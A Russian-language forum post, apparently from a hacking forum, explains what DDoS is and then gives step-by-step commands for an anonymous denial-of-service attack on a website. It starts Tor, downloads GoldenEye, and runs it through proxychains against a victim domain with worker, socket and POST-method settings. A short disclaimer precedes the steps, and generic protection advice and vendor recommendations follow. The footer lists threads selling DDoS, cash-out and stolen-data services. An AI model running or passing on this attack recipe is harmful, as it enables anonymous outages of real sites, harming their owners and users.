Отказ от обслуживания. Анонимная DDoS атака на веб-сайт с помощью GoldenEye и способы защиты

Admin

Original poster
Administrator
Сообщения
902
Реакции
716
Посетить сайт
DDOS.png
Кратко о «Дудосе»
Что это такое?

Википедия гласит:

DDoS (

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

Distributed Denial of Service, дословно «Распределенный отказ в обслуживании») —

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

на вычислительную систему с целью довести её до отказа, то есть создание таких условий, при которых добросовестные пользователи системы не смогут получить доступ к предоставляемым системным ресурсам (серверам), либо этот доступ будет затруднён.
Как работает данная атака и кто ею пользуется?

У каждого веб-сервера имеются ограничения по количеству запросов, которые веб-сервер может может обслуживать одновременно. Если количество запросов будет превышать допустимую норму — вполне возможно следующее:

  1. Замедление работы сервера (замедление обработки запросов)
  2. Полный отказ в обслуживании запросов
Чаще всего злоумышленники добиваются второго — полного отказа в обслуживании. Мотивы могут быть разными: начиная с защиты пользователей от мошеннических сайтов и заканчивая банальной скукой.

Но следует сказать, что пользуются данными атаками не только злоумышленники, но и «белые хакеры», т.е. пентестеры. Этой атакой этичные хакеры тестируют веб-сервера на мощность и способность обрабатывать большое количество запросов одновременно.

Работает DDoS так: злоумышленник создает сеть из «зомби-компьютеров» (на самом деле это не обязательно компьютеры: годными для данной атаки являются все устройства, способные отправлять запросы), и впоследствии использует эту сеть для проведения атаки.

Представим ситуацию: максимальный вес трафика, который может принимать сервер — 1 Гб. Злоумышленник пытается достичь или преодолеть этот барьер. Если получается — сервер сначала тормозит, а потом может и лечь.

Теперь самое интересное: как провести подобную атаку? Сразу предупредим — все, описанное и рассказанное ниже предоставлено лишь в ознакомительных целях. Чужие сервера ломать нельзя, за это могут быть проблемы законом. Мы тебя предупредили.
Необходимые инструменты
  1. EtherApe - графический монитор сети, который графически отображает сетевую активность. Хосты и ссылки меняются в размере с трафиком. Отображение цветовых протоколов.
  2. Service Tor - Tor позволяет клиентам и ретрансляторам предлагать скрытые услуги. То есть вы можете предложить веб-сервер, SSH-сервер и т.д. Не раскрывая свой IP-адрес своим пользователям.
  3. Proxychains - последняя версия Proxychains поддерживает SOCKS5, SOCKS4 и HTTP CONNECT. Прокси-цепи можно смешивать с разными типами прокси.
  4. GoldenEye - GoldenEye - приложение на python, предназначенное только для целей тестирования безопасности.
Как выполнить DDOS атаку на сайт?
1. Запустите etherape: etherape, появится всплывающее окно, которое графически отображает сетевую активность.

2. Запустите службу TOR:

service tor start

3. Загрузите Goldeneye


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


wget

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



4. После загрузки распакуйте его в папку

unzip GoldenEye-master.zip

5. Начать атаку

/GoldenEye-master# proxychains ./goldeneye.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.




  • Добавьте значения для рабочих (-w), сокетов (-s) и метода (-m)
./goldeneye.py victim-website.com -w 100 -s 70 -m post

Если вы не остановите атаку, то в некоторых случаях она "взорвется". Чтобы остановить атаку просто нажмите CTRL+C.
Готово. Через какое-то время сервер будет тормозить, а затем, возможно, ляжет.

Общая защита от DDOS-атаки
  • Снижение скорости IP-соединения.
  • Используйте IDS, межсетевые экраны веб-приложений.
  • Tweak Connection на порог IP.
  • Защитите свои DNS-серверы.
  • Установите средства защиты. Убедитесь, что у вас установлены соответствующие средства защиты как для ваших сетей, так и для ваших приложений. Сюда входят такие ключевые инструменты, как брандмауэры, программное обеспечение для мониторинга сети и антивирусные программы, а также системы мониторинга угроз. С их помощью вы можете отслеживать базовый сетевой трафик и настраивать оповещения о необычном поведении.
  • Держите все в курсе. Все эти системы должны быть обновлены, чтобы гарантировать, что любые ошибки или проблемы исправлены. Обнаружение угроз как можно раньше - лучший способ предотвратить атаку DDoS-атак на важные сетевые инфраструктуры и повлиять на конечных пользователей.
Инструменты для предотвращения DDoS-атак
Есть несколько инструментов, которые я рекомендую для предотвращения и остановки DDoS-атак.

1. Security Event Manager
Для отслеживания поведения сети и маркировки угроз до того, как они станут чрезмерными, мне нравится SolarWinds Security Event Manager (SEM).


Способность быстро реагировать на угрозу жизненно необходима, поскольку инициативы в области безопасности могут быстро стать бесполезными, если их развертывание займет слишком много времени. SEM включает в себя автоматические ответы, которые могут блокировать подозрительный IP или USB, отключать вредоносные устройства или отключать их привилегии, а также уничтожать приложения, которые ведут себя неожиданным образом. Это означает, что задержки при работе с чем-то вроде атаки DDoS сводятся к минимуму.

SEM также контролирует целостность файлов и USB, поэтому, если что-то выглядит не так, его можно остановить.

SolarWinds SEM предлагается бесплатно для тридцатидневной пробной версии. После этого вы можете посмотреть цены для каждого узла.

2. Cloudflare

Cloudflare предлагает гибкий и масштабируемый инструмент, который объединяет несколько методов предотвращения DDoS в одном решении. Он предотвращает проникновение вредоносного и злонамеренного трафика в вашу сеть, а остальная часть сети остается функциональной и высокопроизводительной. Cloudflare использует базу данных репутации для отслеживания потенциальных угроз от злоумышленников.

Для предприятий Cloudflare стоит 200 долларов США в месяц, но на уровне предприятия вам необходимо связаться с Cloudflare для получения расценок.

3. Imperva

Средство защиты Imperva DDoS защищает всю сеть и защищает от атак с помощью обработки пакетов большой емкости. Он обеспечивает защиту от DDoS-атак как всегда, так и по требованию, в зависимости от того, что больше всего подходит вашему бизнесу, а также включает в себя автоматическое обновление панелей мониторинга, отображающих информацию о трафике атак. Основным недостатком инструмента Imperva является то, что он ограничен защитой от DDoS-атак.
 

Вложения

  • 1579953569920.png
    1579953569920.png
    53.8 КБ · Просмотры: 7
Последнее редактирование:
Название темы
Автор Заголовок Раздел Ответы Дата
NikitaKit $$$Продам брут на сайт,с которого можно вытянуть данные от крипто кошельков$$$ Продажа софта 5
V Продам Продажа дедиков от 80 рублей по странам Дедики/VPN/соксы/ssh 1
kirick7 Как защититься от фишинга? Вопросы и интересы 8
proxy-solutions.net Партнерская программа от компании Proxy-Solutions.net. Получайте процент от всех платежей на сайте! Предоставляю работу. Ищу специалиста. 0
It_Alanti Устали от рутинных действий? Автоматизируйте бизнес и освободите от 8 часов в неделю для важных задач. Ищу работу. Предлагаю свои услуги. 1
Zer0D4y Проверено СМС от именни любого сервиса/номера. Все что не подошло по разделу 1
jstatham Продам ОБНАЛ ГРЯЗИ, CALL CENTER от 15% НЕСЁМ ОТВЕТСТВЕННОСТЬ ФЗ-115 Карты/CC/Банки/Enroll 1
balzamos Кидок на 100 $ от JohnWoo Black list и Разборки 3
the_cutlet Продам Дизайн от Котлета Видеоролики Анимация Баннеры Оформление тем и многое другое Услуги дизайнеров/веб-разработчиков 1
K Проверено Различные услуги от сисадмина с большим стажем Сайты/Хостинг/Сервера 3
TriangleHost Продам Triangle.is — Виртуальные серверы от 49 рублей в месяц Сайты/Хостинг/Сервера 0
P Халява от банка Тинькофф Способы заработка 2
brigabos Как заряжать ноутбук от повербенк Свободное общение и флейм 2
Janipai Схема заработка от 5$ в день на своем аккаунте инстаграм Способы заработка 6
turbion0 Проверено DDOS от ↯Turbion Service↯ Спам / Флуд / Ддос 1
UnderD0g Интересно Виски > Сигареты > Reveser Engeneering проходим CrackMe от HTB Полезные статьи 3
is_name Продам Приватные Мобильные Прокси со сменой IP от 500р Дедики/VPN/соксы/ssh 0
Toony Продам ключ от винды за 10 рубасов Продажа софта 1
Khan Интересно Возможное отключение России от глобального интернета Новости в сети 1
S Куплю Скупаю USA дедики под крипт от 100$ Куплю/Обменяю 0
turbion0 Обналичка от ↯Turbion Service↯ Финансы - биллинги, банки, кошельки, логи 3
Р Интересно WWH от 16.11.20 Способы заработка 0
L Работа -оплата за цикл от 200-800 доларов. Предоставляю работу. Ищу специалиста. 0
Gumanoid [бесплатно] Ключ от Overwatch. Раздача (аккаунтов/ключей) 1
zheka424 Заработок на партнерке банков от 2 000 руб Способы заработка 1
A Легкий заработок от 2к руб в день Предоставляю работу. Ищу специалиста. 1
T Дедик на 1 год от Alibaba Раздача dedic/ssh/proxy 0
A AkulaPay.com - Обменник с минимальной покупкой криптовалюты от 1000 рублей Обменники 1
A Как зарабатывать от 10$ на просмотре почты!!! Способы заработка 9
Gumanoid Интересно стикеры «Нямик» от Еда ВКонтакте Полезные статьи 0
H Как взламывают IP- и веб-камеры и как от этого защититься Уязвимости и взлом 0
Tzaz Заработок на бане instagram акканутов(от 300р в день) Обучения, схемы, мануалы 0
Multi-VPN Интересно VPN от multi-vpn.biz Раздача dedic/ssh/proxy 17
GLOV Продам Продажа аккаунтов криптобирж: от самых популярных до малоизвестных(Binance, blockchain.com, localbitcoins и тд)! Финансы - биллинги, банки, кошельки, логи 0
gloom59 Продам Голоса | Стикеры VK от 19 руб. Все что не подошло по разделу 0
V Продам Продажа дедиков серверов купить vps vds на windows от 60 рублей! магазин vps vds дедиков и виртуальных серверов vps vds https://vpskot.ru Дедики/VPN/соксы/ssh 1
Haunted Family Продам Пробив по МВД и ГИБДД | от Haunted Family Пробив информации/Прозвоны 0
Haunted Family Продам Пробив по операторам сотовой связи | от Haunted Family Пробив информации/Прозвоны 0
Wh1t3_F0x Как взламывают IP- и веб-камеры и как от этого защититься Уязвимости и взлом 4
crazyfrog Обнал Сервис от 20% 25% 30% найдём общий интерес с клиентом!!! Россия / Украина. Ищу работу. Предлагаю свои услуги. 0
K HASH HHIDE.ORG - взломан, bd от 17.10.2020 Другое 0
JohnWoo База 2Gis (Вся Россия от 14.10.2020) + 2Gis_Soft 1.0 by Rufus1980 Продажа софта 0
ananda Интересно White Hat Hacker спас $10 млн от кражи из смарт-контракта Ethereum Новости в сети 2
ananda Интересно Взломан DeFi-проект на $15 млн в новом проекте от основателя Yearn.Finance Новости в сети 0
CMDfromBAT Интересно 5 РЕШЕНИЙ ДЛЯ ЗАЩИТЫ ОТ ХАКЕРОВ - комментарии от хаЦкера Свободное общение и флейм 6
F автоматический сервис флуд-телефонов/sms, email spam от hubexpert Все что не подошло по разделу 0
Secretsline Проверено Шустрые ПРОКСИ от Secretsline Дедики/VPN/соксы/ssh 0
S Заработок от 500р в первый же день на рекламе для всех Способы заработка 10
A "Майнинг" монеты TRON [200% от депозита за пару дней] Способы заработка 0
JohnWoo Password Protect Video Master v8.0 (Защита видео от копирования) Продажа софта 0

Название темы